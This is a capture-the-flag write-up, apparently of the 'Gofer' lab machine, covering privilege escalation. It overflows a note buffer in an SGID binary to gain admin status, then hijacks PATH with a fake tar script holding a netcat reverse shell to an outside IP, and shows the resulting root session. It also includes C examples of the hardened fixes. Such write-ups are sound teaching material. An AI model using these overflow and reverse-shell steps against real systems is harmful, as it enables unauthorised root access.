Privilege Escalation
An SGID binary is confirmed to be vulnerable to a data overwrite
As I was able to reproduce the overwrite above multiple times, this presents an opportunity to take control of the user attributes
Counting the result above, it seems that the Role attribute:
- is 15 characters (bytes) long
- gets overwritten if the data written through the note feature (option 4) is more than 24 bytes
With that in mind, I can forge a string to overwrite the Role attribute with admin
AAAAAAAAAAAAAAAABBBBBBBBadmin           CCCCCCCCDDDDDDDDDDDDDDDD
This forged string above
- is 64 bytes in length
- has 24 bytes for the buffer
- is followed by the admin string padded with 11 whitespaces (16 bytes)
- the rest (24 bytes) is filler
I will get to it right away.
tbuckley@gofer:~$ /usr/local/bin/notes
========================================
1) Create an user and choose an username
2) Show user information
3) Delete an user
4) Write a note
5) Show a note
6) Save a note (not yet implemented)
7) Delete a note
8) Backup notes
9) Quit
========================================
your choice: 1
choose an username: qwe
[...REDACTED...]
your choice: 2
username: qwe
role: user
[...REDACTED...]
your choice: 3
[...REDACTED...]
your choice: 2
username:
role: user
I will first create an arbitrary user and delete it right after; the output confirms that the Username attribute is gone
your choice: 4
write your note:
AAAAAAAAAAAAAAAABBBBBBBBadmin           CCCCCCCCDDDDDDDDDDDDDDDD
Then I can deliver the forged string to overwrite the Role attribute to admin
your choice: 2
username: AAAAAAAAAAAAAAAABBBBBBBBadmin
role: admin
It’s confirmed
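The overwrite works because whatever is typed into the note lands in a fixed-size buffer with no length check, so the bytes past position 24 spill into the Role field that follows it. As an added example, not code from the notes binary, here is what the hardened form of that write looks like in C. The struct layout (a 24-byte note directly followed by a 16-byte role) and the field sizes are assumptions taken from the observations above; the 64-byte input is the forged string from this page.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>

/* Assumed layout, inferred from the page: 24-byte note buffer, then the
 * Role attribute (15 characters plus a terminator). Sizes are assumptions. */
#define NOTE_SIZE 24
#define ROLE_SIZE 16

struct user_record {
    char note[NOTE_SIZE];
    char role[ROLE_SIZE];
};

/* Hardened note write: the copy is bounded by the destination size, the
 * field is always NUL-terminated, and over-long input is rejected instead of
 * silently spilling into the neighbouring field.
 * Returns 0 on success, -1 if the note does not fit (old note is kept). */
int set_note(struct user_record *u, const char *input)
{
    size_t len = strnlen(input, NOTE_SIZE);   /* never scan past NOTE_SIZE */
    if (len >= NOTE_SIZE)                     /* must leave room for '\0' */
        return -1;
    memcpy(u->note, input, len);
    u->note[len] = '\0';
    return 0;
}

/* Changing the role is a separate operation with the same bounded-copy
 * discipline; it is never a side effect of writing a note. */
int set_role(struct user_record *u, const char *role)
{
    size_t len = strnlen(role, ROLE_SIZE);
    if (len >= ROLE_SIZE)
        return -1;
    memcpy(u->role, role, len);
    u->role[len] = '\0';
    return 0;
}

/* Returns 1 if the Role field still holds `expected`, 0 otherwise. */
int role_is(const struct user_record *u, const char *expected)
{
    return strncmp(u->role, expected, ROLE_SIZE) == 0;
}

/* Replays the scenario from the page against the hardened write: a fresh
 * user with role "user" receives the 64-byte forged note.
 * Returns 1 if the note was rejected and the role survived, else 0. */
int forged_note_is_contained(void)
{
    struct user_record u;
    memset(&u, 0, sizeof u);
    if (set_role(&u, "user") != 0)
        return 0;
    /* Constructed input: 24 bytes of filler, "admin" padded to 16 bytes
     * with 11 spaces, 24 more bytes of filler (the page's forged string). */
    const char *payload =
        "AAAAAAAAAAAAAAAABBBBBBBB" "admin           " "CCCCCCCCDDDDDDDDDDDDDDDD";
    int rc = set_note(&u, payload);
    return rc == -1 && u.note[0] == '\0' && role_is(&u, "user");
}

int main(void)
{
    printf("forged note contained: %s\n",
           forged_note_is_contained() ? "yes" : "no");
    return 0;
}
```

The two properties worth keeping in mind when reviewing code like this: every write into a fixed buffer is bounded by the destination's size (not the source's), and a field that carries an authorisation decision is only ever modified by the code path that is supposed to modify it.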
Now that I have the admin status, I can access option 8 to perform the backup operation
It appears that the backup operation is conducted with tar
I can also confirm the process with PSPY in the background
The backup operation is using tar to archive the /opt/notes directory to /root/backups/backuo_notes.tar.gz
tbuckley@gofer:/opt$ ll notes
total 8.0K
4.0k drwxr-xr-x 2 root root 4.0k apr 28 16:37 .
4.0k drwxr-xr-x 4 root root 4.0k apr 28 12:59 ..
Although there is nothing in the /opt/notes directory and no sensitive data is found there, there is something that is incredibly easy to miss. It’s right here.
The SGID program is calling tar with a relative path
This can be checked again by peeking into the program itself
The image above is partial output of the strings /usr/local/bin/notes command
It calls tar WITHOUT the absolute path, leaving it vulnerable to a PATH hijacking attack
Path Hijacking
Since the SGID binary calls tar WITHOUT the absolute path, I can just create a malicious tar and hijack the PATH variable of the current session.
tbuckley@gofer:~$ which nc
/usr/bin/nc
First, I need to check the absolute path of Netcat
tbuckley@gofer:~$ echo '/usr/bin/nc 10.10.14.20 1234 -e /bin/bash' > tar
I will then create an arbitrary tar script with a Netcat reverse shell command in it
tbuckley@gofer:~$ export PATH="/home/tbuckley:$PATH"
tbuckley@gofer:~$ echo $PATH
/home/tbuckley:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
Hijacking the $PATH variable sets the home directory as the first priority. Now any invocation of tar in this session resolves to the newly created tar script in the home directory, with the Netcat reverse shell above embedded in it. It’s all set
Your choice: 8
Access granted!
I had already started the SGID binary from the home directory and gone through the overwriting process again. Now selecting option 8 invokes the malicious tar above
┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.11.225] 55920
whoami
root
hostname
gofer.htb
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:0b:c9 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.225/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
The malicious tar is invoked and a root shell session is opened. System Level Compromised
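Both halves of this escalation hinge on the same defect: the privileged program lets the caller's environment decide which tar runs. The fix is to execute an absolute path with a fixed, minimal environment and no shell. As an added example, not the notes binary's own code, here is that pattern in C on Linux; the location /bin/tar and the SAFE_ENV contents are assumptions for the example, and the demo in main() runs harmless commands rather than a real backup.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to the child. Nothing is inherited from the
 * caller, so a user-controlled PATH (or LD_PRELOAD, IFS, ...) cannot change
 * which binary runs. The PATH value here is an assumption for the example. */
static char *const SAFE_ENV[] = {
    "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    NULL
};

/* Executes `path` with `argv` under SAFE_ENV and returns the child's exit
 * status (0..255; 127 means the exec itself failed), or -1 with errno set
 * if `path` is not absolute or the child could not be created.
 * Refusing a relative path is the direct fix for the bare "tar" seen in
 * the strings output above: execve() does no PATH search at all. */
int run_privileged_command(const char *path, char *const argv[])
{
    if (path == NULL || path[0] != '/') {
        errno = EINVAL;
        return -1;
    }
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(path, argv, SAFE_ENV);   /* absolute path, no shell involved */
        _exit(127);                     /* only reached if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* The backup the page describes, done safely: absolute tar path, fixed
 * argument list, and the directories passed as separate argv entries so no
 * string is ever interpreted by a shell. /bin/tar is an assumed location. */
int backup_notes(const char *src_dir, const char *archive)
{
    char *const argv[] = {
        "tar", "-czf", (char *)archive, "-C", (char *)src_dir, ".", NULL
    };
    return run_privileged_command("/bin/tar", argv);
}

/* Convenience wrapper: run `path` with no arguments. */
int run_simple(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    return run_privileged_command(path, argv);
}

int main(void)
{
    /* A relative name is refused before anything is executed. */
    int rc = run_simple("tar");
    printf("run_simple(\"tar\") -> %d (errno %d, EINVAL=%d)\n", rc, errno, EINVAL);

    /* Absolute paths run as expected and report the real exit status. */
    printf("run_simple(\"/bin/true\")  -> %d\n", run_simple("/bin/true"));
    printf("run_simple(\"/bin/false\") -> %d\n", run_simple("/bin/false"));
    return 0;
}
```

A quick sanity check for an existing privileged program is whether any execve()/execvp()/system() call site, or any command string visible in strings output, names a program without a leading slash; with the pattern above that question is answered once, in run_privileged_command(), rather than at every call site.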